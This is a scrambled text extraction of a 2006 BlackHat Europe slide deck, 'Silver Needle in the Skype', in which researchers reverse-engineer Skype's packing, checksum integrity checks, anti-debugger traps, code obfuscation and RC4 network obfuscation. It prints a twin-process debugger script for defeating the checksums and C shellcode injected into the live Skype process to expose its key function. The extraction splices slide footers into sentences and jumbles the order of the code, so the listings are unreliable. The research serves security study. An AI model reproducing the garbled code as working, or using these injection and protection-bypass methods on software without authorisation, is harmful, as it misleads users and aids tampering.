Skype protections Skype seen from the network Advanced/diverted Skype functions

Silver Needle in the Skype
Philippe BIONDI Fabrice DESCLAUX

phil(at)secdev.org / philippe.biondi(at)eads.net serpilliere(at)rstack.org / fabrice.desclaux(at)eads.net EADS Corporate Research Center — DCR/STI/C IT sec Lab Suresnes, FRANCE

BlackHat Europe, March 2nd and 3rd , 2006

Philippe BIONDI, Fabrice DESCLAUX

Silver Needle in the Skype

1/98

Skype protections Skype seen from the network Advanced/diverted Skype functions

Outline
1 2

3

4

5

Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion
Silver Needle in the Skype 2/98

Philippe BIONDI, Fabrice DESCLAUX

Skype protections Skype seen from the network Advanced/diverted Skype functions

Problems with Skype
The network view

From a network security administrator point of view Almost everything is obfuscated (looks like /dev/random) Peer to peer architecture
many peers no clear identification of the destination peer

Automatically reuse proxy credentials Traffic even when the software is not used (pings, relaying) =⇒ Impossibility to distinguish normal behaviour from information exfiltration (encrypted traffic on strange ports, night activity) =⇒ Jams the signs of real information exfiltration

Philippe BIONDI, Fabrice DESCLAUX

Silver Needle in the Skype

3/98

Fabrice DESCLAUX Silver Needle in the Skype 4/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Problems with Skype The system view From a system security administrator point of view Many protections Many antidebugging tricks Much ciphered code A product that works well for free (beer) ?! From a company not involved on Open Source ?! =⇒ Is there something to hide ? =⇒ Impossible to scan for trojan/backdoor/malware inclusion Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Problems with Skype Some legitimate questions The Chief Security Officer point of view Is Skype a backdoor ? Can I distinguish Skype’s traffic from real data exfiltration ? Can I block Skype’s traffic ? Is Skype a risky program for my sensitive business ? Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 5/98 .

5e+06 connected 4e+06 3.5e+06 5e+06 4. 6e+06 5.5e+06 2e+06 0 500 1000 time 1500 2000 2500 Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 6/98 .5e+06 3e+06 2.Skype protections Skype seen from the network Advanced/diverted Skype functions Problems with Skype Idea of usage inside companies ? At least 700k regularly used only on working days.

Fabrice DESCLAUX Silver Needle in the Skype 7/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Problems with Skype Context of our study Our point of view We need to interoperate Skype protocol with our firewalls We need to check for the presence/absence of backdoors We need to check the security problems induced by the use of Skype in a sensitive environment Philippe BIONDI.

Fabrice DESCLAUX .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 8/98 Philippe BIONDI.

Fabrice DESCLAUX Silver Needle in the Skype 9/98 . Clear part Encrypted part Philippe BIONDI.Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Encryption Avoiding static disassembly Some parts of the binary are xored by a hard-coded key In memory. Skype is fully decrypted Skype Binary Decryption Procedure: Each encrypted part of the binary will be decrypted at run time.

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Structure overwriting Anti-dumping tricks 1 2 3 The program erases the beginning of the code The program deciphers encrypted areas Skype import table is loaded. erasing part of the original import table Code Erased code Erased code Erased code Transition code Transition code Transition code Transition code Ciphered code Ciphered code Deciphered code Deciphered code Original import table Original import table Original import table Original import table Skype import table Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 10/98 .

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Unpacking Binary reconstruction Skype seems to have its own packer. Fabrice DESCLAUX Silver Needle in the Skype 11/98 . We need an unpacker to build a clean binary 1 2 3 4 Read internal area descriptors Decipher each area using keys stored in the binary Read all custom import table Rebuild new import table with common one plus custom one in another section Patch to avoid auto decryption 5 Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Unpacking Erased code Erased code Transition code Modified Transition code Deciphered code Deciphered code Original import table Skype import table Old original import table Old Skype import table New full import table Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 12/98 .

dll WINMM.dll RPCRT4.dll WS2 32..Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Some statistics Ciphered vs clear code Legend: Code Data Unreferenced code Ciphered vs clear code Libraries used in hidden imports 674 classic imports 169 hidden imports KERNEL32.. Fabrice DESCLAUX . Silver Needle in the Skype 13/98 Philippe BIONDI.dll .

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 14/98 Philippe BIONDI. Fabrice DESCLAUX .

Fabrice DESCLAUX Silver Needle in the Skype 15/98 .. Checker’ .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Checksumers scheme in Skype Checksumers scheme Checker 1 Checker’ 1 Checker 2 Checker’ 2 Code Checker ... Checker N Checker’ N Main scheme of Skype code checkers Philippe BIONDI.

OxE8D6E4B7 . OxC0B8797A db Ox61 . Ox1C4C4 mov ebx . OxBD lbl3 : sub eax . OxD8FBBD1 . eax add ebx .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation start : xor edi . OxA36CFB2F . [ e d i+Ox10 ] jmp lbl1 db Ox19 lbl1 : sub eax . 1 dec ebx jnz loop start jmp lbl2 db Ox73 lbl2 : jmp lbl3 dd OxC8528417 . Ox4C49F346 Philippe BIONDI. Ox320E83 xor eax . e c x sub edi . Fabrice DESCLAUX Silver Needle in the Skype 16/98 . Ox688E5C mov eax . OxFFCC5AFD loop start : mov ecx . edi add e d i .

. .) Checksumer length is random Dummy mnemonics are inserted Final test is not trivial: it can use final checksum to compute a pointer for next code part. Philippe BIONDI. xor.. sub.Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Semi polymorphic checksumers Interesting characteristics Each checksumer is a bit different: they seem to be polymorphic They are executed randomly The pointers initialization is obfuscated with computations The loop steps have different values/signs Checksum operator is randomized (add. Fabrice DESCLAUX Silver Needle in the Skype 17/98 .

Fabrice DESCLAUX Silver Needle in the Skype 18/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Semi polymorphic checksumers But... They are composed of A pointer initialization A loop A lookup A test/computation We can build a script that spots such code Philippe BIONDI.

Fabrice DESCLAUX Silver Needle in the Skype 19/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Global checksumer scheme Each rectangle represents a checksumer An arrow represents the link checker/checked In fact. there were nearly 300 checksums Philippe BIONDI.

Fabrice DESCLAUX Silver Needle in the Skype 20/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation How to get the computed value Solution 1 Put a breakpoint on each checksumer Collect all the computed values during a run of the program J Software breakpoints change the checksums ² We only have 4 hardware breakpoints =⇒ Twin processes debugging Solution 2 Emulate the code Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Twin processes debugging 1 2 3 Put software breakpoints on every checksumers of one process Run it until it reaches a breakpoint Put 2 hardware breakpoints before and after the checksumer of the twin process Use the twin process to compute the checksum value Write it down Report it into the first process and jump the checksumer Go to point 2 4 5 6 7 Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 21/98 .

Skype protections Skype seen from the network Advanced/diverted Skype functions

Binary packing Code integrity checks Anti debugging technics Code obfuscation

Twin processes debugging
Process 1 Soft Hard Process 2

Twin Debugger PC

Philippe BIONDI, Fabrice DESCLAUX

Silver Needle in the Skype

22/98

Skype protections Skype seen from the network Advanced/diverted Skype functions

Binary packing Code integrity checks Anti debugging technics Code obfuscation

Twin processes debugging
Process 1 Soft Hard Process 2

Twin Debugger

PC

Philippe BIONDI, Fabrice DESCLAUX

Silver Needle in the Skype

22/98

Skype protections Skype seen from the network Advanced/diverted Skype functions

Binary packing Code integrity checks Anti debugging technics Code obfuscation

Twin processes debugging
Process 1 Soft Hard Process 2

Twin Debugger

PC

Philippe BIONDI, Fabrice DESCLAUX

Silver Needle in the Skype

22/98

. k e y s ( ) : p .. e i p . e i p ] ) q . } p = p y t s t o p . eax = q . Fabrice DESCLAUX Silver Needle in the Skype 23/98 . s t r a c e ( " / usr / bin / skype " ) f o r bp i n checksumer .. eip Philippe BIONDI. s e t h b p ( c h e c k s u m e r s [ p . cont ( ) q . d e l h b p ( hbp ) p r i n t " Checksumer at %08 x set eax =%08 x " % ( p . s e t b p ( bp ) while 1: p . eip = q . s t r a c e ( " / usr / bin / skype " ) q = p y t s t o p .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Twin processes debugging Twin processes debugger using PytStop [PytStop] import pytstop checksumers = { s t a r t : stop . cont ( ) hbp = q . eax p . q . eax ) p .

. And Skype runs faster! © Philippe BIONDI..Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Checksum execution and patch Solution 2 1 Compute checksum for each one 2 3 4 5 The script is based on a x86 emulator Spot the checksum entry-point: the pointer initialization Detect the end of the loop Then. replace the whole loop by a simple affectation to the final checksum value =⇒ Each checksum is always correct . Fabrice DESCLAUX Silver Needle in the Skype 24/98 .

e c x sub edi . edi add e d i . eax add ebx . . ] db Ox61 . OxD8FBB [ . OxBD lbl3 : sub eax . Ox1C4C4 mov ebx . edi add e d i .. . Ox320E83 xor eax .. Ox4C49F311 nop [ . Ox688E5C mov eax . Ox4C49F346 Silver Needle in the Skype start : xor edi . Ox4C49F346 25/98 . Ox1C4C4 mov ebx . 1 dec ebx jnz loop start jmp lbl2 db Ox73 lbl2 : jmp lbl3 dd OxC8528417 . . Ox688E5C mov eax . . ] nop jmp lbl2 db Ox73 lbl2 : jmp lbl3 dd OxC8528417 . [ e d i+Ox10 ] jmp lbl1 db Ox19 lbl1 : mov eax . OxFFCC5AFD loop start : mov ecx . OxD8FBB [ .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Philippe BIONDI. OxBD lbl3 : sub eax . Ox320E83 xor eax . eax add ebx . Fabrice DESCLAUX start : xor edi . ] db Ox61 . [ e d i+Ox10 ] jmp lbl1 db Ox19 lbl1 : sub eax . OxFFCC5AFD loop start : mov ecx .

o f f s e t " 3 8 1 3 3 5 9 3 1 3 6 0 3 7 6 7 7 5 4 2 3 0 6 4 3 4 2 9 8 9 3 6 7 5 1 1 .. [ ebp+v a r 1 0 ] . Fabrice DESCLAUX Silver Needle in the Skype 26/98 . o f f s e t " 65537 " to bignum .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Last but not least Signature based integrity-check There is a final check: Integrity check based on RSA signature Moduli stored in the binary lea mov call lea mov call eax edx str eax edx str . " to bignum Philippe BIONDI. [ ebp+v a r C ] ..

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 27/98 Philippe BIONDI. Fabrice DESCLAUX .

If it works.Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Counter measures against dynamic attack Counter measures against dynamic attack Skype has some protections against debuggers Anti Softice: It tries to load its driver. Fabrice DESCLAUX Silver Needle in the Skype 28/98 . Generic anti-debugger: The checksums spot software breakpoints as they change the integrity of the binary Counter counter measures The Rasta Ring 0 Debugger [RR0D] is not detected by Skype Philippe BIONDI. Softice is loaded.

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Binary protection: Anti debuggers The easy one: First Softice test mov eax . a l Hidden test: It checks whether Softice is in the Driver list c a l l EnumDeviceDrivers .sy ’ jnz next cmp ecx . o f f s e t s t r S i w v i d ... ’ ntic ’ jnz next cmp ebx .. ’ e. cmp eax . c a l l GetDeviceDriverBaseNameA . "\\\\ . Fabrice DESCLAUX Silver Needle in the Skype 29/98 .. \\ Siwvid " call test driver t e s t al . ’s \ x00 \ x00 \ x00 ’ jnz next Philippe BIONDI.

’ ys \ x00 \ x00 ’ short next Timing measures Skype does timing measures in order to check if the process is debugged or not call mov gettickcount g e t t i c k c o u n t r e s u l t . ’ xt.Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Binary protection: Anti debuggers Anti-anti Softice IceExt is an extension to Softice cmp jnz cmp jnz cmp jnz e s i . ’ icee ’ short next e d i .s ’ short next eax . Fabrice DESCLAUX Silver Needle in the Skype 30/98 . eax Philippe BIONDI.

. pushf pusha mov mov add sub popa jmp save esp . Fabrice DESCLAUX Silver Needle in the Skype 31/98 .. it traps the debugger : registers are randomized a random page is jumped into It’s is difficult to trace back the detection because there is no more stack frame.. esp ad alloc? random value 20 h random mapped page Philippe BIONDI. esp . esp . esp . no EIP.Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Binary protection: Anti debuggers Counter measures When it detects an attack.

filtered with those properties in order to spot the creation of this page We then spot the pointer that stores this page location We can then put an hardware breakpoint to monitor it.Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Binary protection: Anti debuggers Solution The random memory page is allocated with special characteristics So breakpoint on malloc(). and break in the detection code Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 32/98 .

Fabrice DESCLAUX .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 33/98 Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions

Binary packing Code integrity checks Anti debugging technics Code obfuscation

Protection of sensitive code
Code obfuscation The goal is to protect code from being reverse engineered Principle used here: mess the code as much as possible Advantages Slows down code study Avoids direct code stealing Drawbacks Slows down the application Grows software size
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 34/98

Skype protections Skype seen from the network Advanced/diverted Skype functions

Binary packing Code integrity checks Anti debugging technics Code obfuscation

Techniques used
Code indirection calls
mov sub mov mov call neg add mov mov call ; eax = eax , 9FFB40h eax , 7 F80h edx , 7799 C1Fh ecx , [ ebp −14h ] eax ; s u b _ 9 F 7 B C 0 eax eax , 19 C87A36h edx , 0CCDACEF0h ecx , [ ebp −14h ] eax 009 F8F70 sub 9F8F70 : mov eax , [ e c x +34h ] push esi mov e s i , [ e c x +44h ] sub eax , 292 C1156h add e s i , eax mov eax , 371509EBh sub eax , edx mov [ e c x +44h ] , e s i xor eax , 40 F0FC15h pop esi retn

Principle Each call is dynamically computed: difficult to follow statically
Philippe BIONDI, Fabrice DESCLAUX Silver Needle in the Skype 35/98

Skype protections Skype seen from the network Advanced/diverted Skype functions

Binary packing Code integrity checks Anti debugging technics Code obfuscation

In C, this means

Determined conditional jumps ... i f ( s i n ( a ) == 42 ) { do dummy stuff ( ) ; } go on ( ) ; ...

Philippe BIONDI, Fabrice DESCLAUX

Silver Needle in the Skype

36/98

350CA27h pop ecx Sometimes. the code raises an exception An error handler is called If it’s a fake error. Fabrice DESCLAUX Silver Needle in the Skype 37/98 . Philippe BIONDI. 17 h xor eax .Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Techniques used Execution flow rerouting lea edx . eax call RaiseException rol eax . [ e s p+4+v a r 4 ] add eax . the handler tweaks memory addresses and registers =⇒ back to the calling code Principle Hard to understand the whole code: we have to stop the error handler and study its code. 3D4D101h push o f f s e t area push edx mov [ e s p+0Ch+v a r 4 ] .

Skype protections Skype seen from the network Advanced/diverted Skype functions Binary packing Code integrity checks Anti debugging technics Code obfuscation Bypassing this little problem Bypassing this little problem In some cases we were able to avoid the analysis We injected shellcodes to parasitize these functions Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 38/98 .

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 39/98 Philippe BIONDI. Fabrice DESCLAUX .

Either : Obfuscated payload Ack / NAck packet payload forwarding packet payload resending packet few other stuffs Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 40/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype on UDP Skype UDP start of frame Begin with a Start of Frame layer compounded of a frame ID number (2 bytes) a type of payload (1 byte).

66. Fabrice DESCLAUX Silver Needle in the Skype 41/98 .131 24..] Philippe BIONDI.72.98.16..80 ” 2051 8275 26 0x219c 0x7f4e 0x2 45 00 00 2e 00 04 40 00 40 11 eb 75 ac 10 48 83 18 62 42 50 08 03 20 53 00 1a 21 9c 7f 4e 02 11 8a c0 37 fc 95 75 5e 5e b9 81 7a 8e fa 81 Skype Crypted Data iv 0x118AC037L crc32 0xFC95755EL crypted ’ˆ\xb9\x81z\x8e\xf[.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype Network Obfuscation Layer IP version ihl tos len id flags frag ttl proto chksum src dst options UDP sport dport len chksum Skype SoF id func 4L 5L 0x0 46 4 DF 0L 64 UDP 0xeb75 172.

Fabrice DESCLAUX Silver Needle in the Skype 42/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype Network Obfuscation Layer Data are encrypted with RC4 The RC4 key is calculated with elements from the datagram public source and destination IP Skype’s packet ID Skype’s obfuscation layer’s IV Source IP Destination IP ID \x00\x00 IV CRC32 seed seed to RC4 key engine RC4 key (80 bytes) Philippe BIONDI.

124. it uses 0.176.86 b0 86 56 7f 4e 77 52 7c 48 33 83 UDP sport dport len chksum Skype SoF id func Skype NAck src dst Philippe BIONDI.0.0 Its peer won’t be able to decrypt the message (bad CRC) =⇒ The peer sends a NAck with the public IP Skype updates what it knows about its public IP accordingly 24 16 08 03 00 13 08 54 9238 2051 19 0x854 0x7f4e 0x77 82.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype Network Obfuscation Layer The public IP Problem 1: how does Skype know the public IP ? 1 2 3 4 At the begining. Fabrice DESCLAUX Silver Needle in the Skype 43/98 .134.72.0.51 131.

Fabrice DESCLAUX Silver Needle in the Skype 44/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype Network Obfuscation Layer The seed to RC4 key engine Problem 2: What is the seed to RC4 key engine ? It is not an improvement of the flux capacitor It is a big fat obfuscated function It was designed to be the keystone of the network obfuscation RC4 key is 80 bytes. but there are at most 232 different keys It can be seen as an oracle We did not want to spend time on it =⇒ we parasitized it Note: RC4 is used for obfuscation not for privacy Philippe BIONDI.

Fabrice DESCLAUX Silver Needle in the Skype 45/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype Network Obfuscation Layer The seed to RC4 key engine Parasitizing the seed to RC4 key engine We injected a shellcode that 1 2 3 read requests on a UNIX socket fed the requets to the oracle function wrote the answers to the UNIX socket Philippe BIONDI.

} u n l i n k ( path ) . 8 0 . while (1) { f l e n = s i z e o f ( from ) . i n t s e e d ) . s a . from . 0 . SOCK DGRAM. key . &f l e n ) . 0 ) . c l o s e ( s ) . s u n p a t h [ s ] = path [ s ] . f l e n ) . f o r ( j =0. k . s < s i z e o f ( path ) . j <0x14 . Fabrice DESCLAUX Silver Needle in the Skype 46/98 . o r a c l e ( key . unsigned i n t i . ( s t r u c t s o c k a d d r ∗)&from . b i n d ( s . ( s t r u c t s o c k a d d r ∗)&sa . i n t s . j . c h a r path [ ] = " / tmp / oracle " . ( s t r u c t s o c k a d d r ∗)&from . f l e n . s = s o c k e t ( PF UNIX . o r a c l e = ( v o i d ( ∗ ) ( ) ) 0 x0724c1e . s i z e o f ( s a ) ) . &i . s++) s a . s e n d t o ( s .Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype Network Obfuscation Layer The seed to RC4 key engine v o i d main ( v o i d ) { u n s i g n e d c h a r key [ 8 0 ] . j ++) ∗( u n s i g n e d i n t ∗ ) ( key+4∗ j ) = i . s u n f a m i l y = AF UNIX . 4 . f o r ( s = 0 . 0 . r e c v f r o m ( s . u n l i n k ( path ) . e x i t ( 5 ) . i ) . v o i d (∗ o r a c l e ) ( u n s i g n e d c h a r ∗key . } Philippe BIONDI. s t r u c t s o c k a d d r u n sa .

’..py -R oracle_shcode.] 000001d0 fe ff ff 53 bb 0b 00 00 00 cd 000001e0 ff 2f 74 6d 70 2f 6f 72 61 63 $ siringe -f oracle..[.......| |....WVS..S../tmp/oracle....... Fabrice DESCLAUX Silver Needle in the Skype 47/98 .| /tmp/oracle= Philippe BIONDI...Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Use of the shellcode $ shellforge.bin | hexdump -C 00 00 e8 00 00 00 |U.[....c | tee 00000000 55 89 e5 57 56 53 81 ec cc 01 00000010 00 5b 81 c3 ef ff ff ff 8b 93 [...bin -p ‘pidof skype‘ $ ls -lF /tmp/oracle srwxr-xr-x 1 pbi pbi 0 2006-01-16 13:37 oracle...| e5 01 00 00 8b 8b |..| 80 5b e9 27 ff ff 6c 65 00 |......

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Skype on TCP The seed is sent in the first 4 bytes of the stream The RC4 stream is used to decrypt the 10 following bytes that should be 00 01 00 00 00 01 00 00 00 01/03 the RC4 stream is reinitialised and used again for the remaining of the stream TCP sport dport seq ack dataofs reserved flags window chksum urgptr options 3196 18812 2334588416L 1737200067L 8L 0L PA 2920 0x5114 0 [(’NOP’. None). Fabrice DESCLAUX Silver Needle in the Skype 48/98 ...] init str Philippe BIONDI. (’[...] 0c 7c 49 7c 8b 26 fe 00 67 8b 91 c3 80 18 0b 68 51 14 00 00 01 01 08 0a 4c d8 77 45 00 00 00 00 33 fb af 76 28 ab b1 93 0a ff 6c df 55 b1 Skype init TCP packet seed 0x33FBAF76L ’(\xab\xb1\x93\n\x[.

Fabrice DESCLAUX .Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 49/98 Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Low level datagrams : the big picture Almost everything is ciphered Data can be fragmented Each command comes with its parameters in an object list The object list can be compressed Enc SoF Frag Ack Forward NAck Forwarded message Cmd Encod Object list Compressed list Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 50/98 .

a string.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Object lists Object List An object can be a number. or even another object list Each object has an ID Skype knows which object corresponds to which command’s parameter from its ID List size Number IP:port List of numbers String RSA key Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 51/98 . an IP:port.

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 52/98 Philippe BIONDI. Fabrice DESCLAUX .

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype For P in packets: zip P Packet compression Each packet can be compressed The algorithm used: arithmetic compression Zip would have been too easy © Principle Close to Huffman algorithm Reals are used instead of bits Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 53/98 .

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0.5 B 0. We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A 0. 1] is splited in subintervals for each symbol according to their frequency We encode ACAB.625 C 1 Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 54/98 . First symbol is A.

We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A 0.625 C 1 Philippe BIONDI.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0.5 B 0. 1] is splited in subintervals for each symbol according to their frequency We encode ACAB. First symbol is A. Fabrice DESCLAUX Silver Needle in the Skype 54/98 .

625 C 1 Philippe BIONDI.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0. We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A A 0. First symbol is A.5 B 0. 1] is splited in subintervals for each symbol according to their frequency We encode ACAB. Fabrice DESCLAUX Silver Needle in the Skype 54/98 .

1] is splited in subintervals for each symbol according to their frequency We encode ACAB. First symbol is A. Fabrice DESCLAUX Silver Needle in the Skype 54/98 . We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A A C 0.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0.625 C 1 Philippe BIONDI.5 B 0.

625 C 1 Philippe BIONDI. We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A A C A 0. Fabrice DESCLAUX Silver Needle in the Skype 54/98 . First symbol is A. 1] is splited in subintervals for each symbol according to their frequency We encode ACAB.5 B 0.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0.

625 C 1 Philippe BIONDI.5 B 0. 1] is splited in subintervals for each symbol according to their frequency We encode ACAB.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0. First symbol is A. We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A A C A 0. Fabrice DESCLAUX Silver Needle in the Skype 54/98 .

1] is splited in subintervals for each symbol according to their frequency We encode ACAB.625 C 1 Reals here encode ACAB Philippe BIONDI.5 B 0. First symbol is A.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0. Fabrice DESCLAUX Silver Needle in the Skype 54/98 . We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A A C A 0.

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Outline 1 2 3 4 5 Context of the study Skype protections Binary packing Code integrity checks Anti debugging technics Code obfuscation Skype seen from the network Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Conclusion Silver Needle in the Skype 55/98 Philippe BIONDI. Fabrice DESCLAUX .

Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype How to speak Skype Skypy. Fabrice DESCLAUX Silver Needle in the Skype 56/98 . the Scapy add-on We developed an add-on to Scapy from the “binary specifications” It uses the Oracle Revelator shellcode and a TCP←→UNIX relay to de-obfuscate datagrams It can reassemble and decode obfuscated TCP streams It can assemble Skype packets and speak Skype Philippe BIONDI.

